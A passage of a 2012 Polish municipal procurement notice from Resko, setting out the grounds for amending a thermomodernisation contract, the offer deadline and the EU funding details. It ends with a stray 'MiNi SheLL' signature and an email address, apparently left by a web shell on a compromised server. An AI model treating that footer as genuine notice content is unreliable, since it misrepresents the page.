1)	niedostępność na rynku materiałów lub urządzeń wskazanych w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót spowodowana zaprzestaniem produkcji lub wycofaniem z rynku tych materiałów lub urządzeń;
2)	pojawienie się na rynku materiałów lub urządzeń nowszej generacji pozwalających na zaoszczędzenie kosztów realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego przedmiotu umowy, lub umożliwiające uzyskanie lepszej jakości robót;
3)	pojawienie się nowszej technologii wykonania zaprojektowanych robót pozwalającej na zaoszczędzenie czasu realizacji inwestycji lub kosztów wykonywanych prac, jak również kosztów eksploatacji wykonanego przedmiotu umowy;
4)	konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań
technicznych/technologicznych niż wskazane w dokumentacji projektowej lub
specyfikacji technicznej wykonania i odbioru robót, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy,
5)	odmienne od przyjętych w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót warunki geologiczne skutkujące niemożliwością zrealizowania przedmiotu umowy przy dotychczasowych założeniach technologicznych;
6)	odmienne od przyjętych w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót warunki terenowe, w szczególności istnienie niezinwentaryzowanych lub błędnie zinwentaryzowanych obiektów budowlanych;
7)	konieczność zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa;
8)	konieczność usunięcia sprzeczności w dokumentacji w przypadku niemożności usunięcia sprzeczności przy pomocy wykładni, w szczególności, gdy sprzeczne zapisy mają równy stopień pierwszeństwa.

W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w pkt II możliwa jest w szczególności zmiana sposobu wykonania, materiałów i technologii robót, jak również zmiany lokalizacji budowanych urządzeń.

III.	Pozostałe rodzaje zmian spowodowane następującymi okolicznościami:
1)	zmiana osób, które będą uczestniczyć w wykonywaniu przedmiotu umowy na inne spełniające warunki określone w SIWZ, według polityki kadrowej Wykonawcy; zmiana tych osób nie wymaga aneksu do umowy (dla skutecznej zmiany niezbędne jest uzyskanie zgody Zamawiającego na zaproponowaną osobę);
2)	siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ;
3)	zmiana obowiązującej stawki VAT;
4)	zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy na skutek zmian zawartej przez Zamawiającego umowy                o dofinansowanie projektu lub wytycznych dotyczących realizacji projektu;
5)	kolizja z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami; (W takim przypadku zmiany w umowie zostaną ograniczone do zmian koniecznych powodujących uniknięcie lub usunięcie kolizji);
6)	zmiany uzasadnione okolicznościami, o których mowa w art. 357 1 § 1 Kodeksu cywilnego.
7)	gdy zaistnieje inna okoliczność prawna, ekonomiczna lub techniczna skutkująca niemożliwością wykonania lub należytego wykonania umowy zgodnie z SIWZ.  

W przypadku wystąpienia okoliczności wymienionych wyżej, możliwa jest                    w szczególności zmiana sposobu wykonania, materiałów i technologii robót, jak również zmiana lokalizacji budowanych urządzeń.
W przypadku określonym w pkt 3, zmiana stawki VAT dotyczyć będzie ceny kontraktowej, w części, jakiej dotyczą te zmiany przepisów.
W przypadku pkt 4, zmiany dostosują sposób rozliczeń lub płatności do wymogów zmienionej umowy o dofinansowanie projektu lub nowych wytycznych dotyczących realizacji projektu.
W przypadku pkt 5, zmiany mogą dotyczyć zakresu wykonywanych prac, zmian dokumentacji i zmniejszenia wynagrodzenia o kwoty odpowiadające cenie robót,           z których Zamawiający rezygnuje.
Zmiana wynagrodzenia Wykonawcy jest możliwa w przypadkach wskazanych wyżej, na zasadach określonych w warunkach umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.resko.pl zakładka Zamówienia publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski, ul. Rynek 1, 72-315 Resko, pokój nr 20, w godzinach pracy urzędu..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.06.2012 godzina 13:15, miejsce: Urząd Miejski, ul. Rynek 1, 72-315 Resko, pokój nr 13 (sekretariat)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie realizowane w ramach Programu Operacyjnego Infrastruktura i Środowisko 2007-2013 Priorytet IX Infrastruktura Energetyczna Przyjazna Środowisku i Efektywność Energetyczna Działanie 9.3 Termomodernizacja Obiektów Użyteczności Publicznej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com